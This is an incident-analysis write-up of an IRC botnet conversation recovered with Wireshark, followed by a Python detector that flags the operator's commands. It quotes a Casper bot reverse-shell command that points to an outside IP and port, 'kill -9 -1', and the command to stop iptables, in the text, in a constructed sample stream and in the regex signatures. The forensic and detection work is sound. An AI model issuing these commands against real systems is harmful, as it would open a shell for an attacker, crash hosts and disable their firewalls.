Wireshark Intro
I recommend going to How to Geek's tutorial for an intro to Wireshark. There you can learn how to capture packets and all the options that accompany that. Here we just take a simple packet capture and analyze it.
Computer Evidence Analyzed
Below is an image of the IRC relay we were able to isolate from the packet capture. We determined the situation and the attack taking place from the conversation between two people in the relay.
Findings
Upon receiving the sanitized packet capture we opened it in Wireshark to view its details. By following the TCP stream we isolated the IRC chat relay. The first thing we noticed was a conversational rhythm in what appeared to be a foreign language. By copying and pasting the text into Google Translate we determined that the conversation between the two users was in Romanian. Analyzing the conversation further, we noticed a third member of the conversation, which we determined to be a bot responding to K3nt!’s commands.
There appeared to be four main technical actions taking place on a Unix system based on the commands given.
- @conback command
  - By searching for “@conback” we determined that this command is specific to the Casper bot. Further investigation revealed that this command, when followed by an <ip address> and a <port>, creates a reverse shell that gives K3nt! access to the targeted system. The IP address given to this command is 74.208.109.177 on port 2009. A lookup of this IP address points to a hosting provider in Philadelphia. This may or may not be the attacker’s actual location; it may merely be a host.
- id command
  - The “id” command showed that K3nt! was running as root once they gained access to the system. We know K3nt! was root because of what the bot returned: uid=0(root) gid=0(root) groups=48(apache).
- kill -9 -1 command
  - The “kill -9 -1” command sends SIGKILL to every process except PID 1, effectively slashing the whole process tree. This essentially crashes the machine and forces a restart.
- iptables service stop command
  - iptables is the Linux firewall, and K3nt! is clearly stopping the service and bringing down the firewall.
After taking down the Linux firewall, K3nt! sends a final message, “I am scos ;))”, which translates to “I am out”, after which the packet capture ends.
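The four actions above can be turned into a small detector that runs over the text Wireshark's "Follow TCP Stream" produces for the IRC channel. This is an added example, not code from the original write-up; the sample stream is constructed, the nick "K3nt", channel "#chan" and user@host parts are assumptions, and the exact spelling of the iptables stop command is assumed too.

```python
import re

# Constructed sample of what Wireshark's "Follow TCP Stream" shows for the
# channel: raw IRC PRIVMSG lines. Nick "K3nt", channel "#chan" and the
# user@host parts are assumptions; the commands mirror the write-up.
SAMPLE_STREAM = """\
:K3nt!u@h PRIVMSG #chan :@conback 74.208.109.177 2009
:K3nt!u@h PRIVMSG #chan :id
:bot!b@h PRIVMSG #chan :uid=0(root) gid=0(root) groups=48(apache)
:K3nt!u@h PRIVMSG #chan :salut, ce faci?
:K3nt!u@h PRIVMSG #chan :kill -9 -1
:K3nt!u@h PRIVMSG #chan :service iptables stop
:K3nt!u@h PRIVMSG #chan :scos ;))
"""
# IRC wire format: ":nick!user@host PRIVMSG <target> :<body>"
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<body>.*)$")
# Signatures for the four operator actions in the write-up (label, severity, regex).
# The exact spelling of the iptables stop command is an assumption.
SIGNATURES = [
    ("reverse_shell", "critical",
     re.compile(r"^@conback\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})$")),
    ("whoami_probe", "low", re.compile(r"^id$")),
    ("process_kill_all", "high", re.compile(r"^kill\s+-9\s+-1$")),
    ("firewall_stop", "high",
     re.compile(r"^(?:service\s+iptables\s+stop|/etc/init\.d/iptables\s+stop)$")),
]
ROOT_RE = re.compile(r"\buid=0\(root\)")  # bot output proving a root shell

def parse_privmsg(line):
    """Return (nick, target, body) for a PRIVMSG line, or None for anything else."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    return None if m is None else (m["nick"], m["target"], m["body"].strip())

def analyze_stream(text):
    """Walk the reconstructed stream and return findings in stream order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_privmsg(line)
        if parsed is None:
            continue  # PING/JOIN/etc. carry no operator commands
        nick, _target, body = parsed
        for label, severity, rx in SIGNATURES:
            m = rx.match(body)
            if m:  # captured groups (ip, port) ride along for the report
                findings.append({"line": lineno, "nick": nick, "label": label,
                                 "severity": severity, "body": body, **m.groupdict()})
        if ROOT_RE.search(body):
            findings.append({"line": lineno, "nick": nick, "label": "root_shell_confirmed",
                             "severity": "critical", "body": body})
    return findings
```

Feeding the real stream export through `analyze_stream` reproduces the timeline in the findings above: the @conback callback with its IP and port, the root confirmation from the bot, then the kill and firewall teardown.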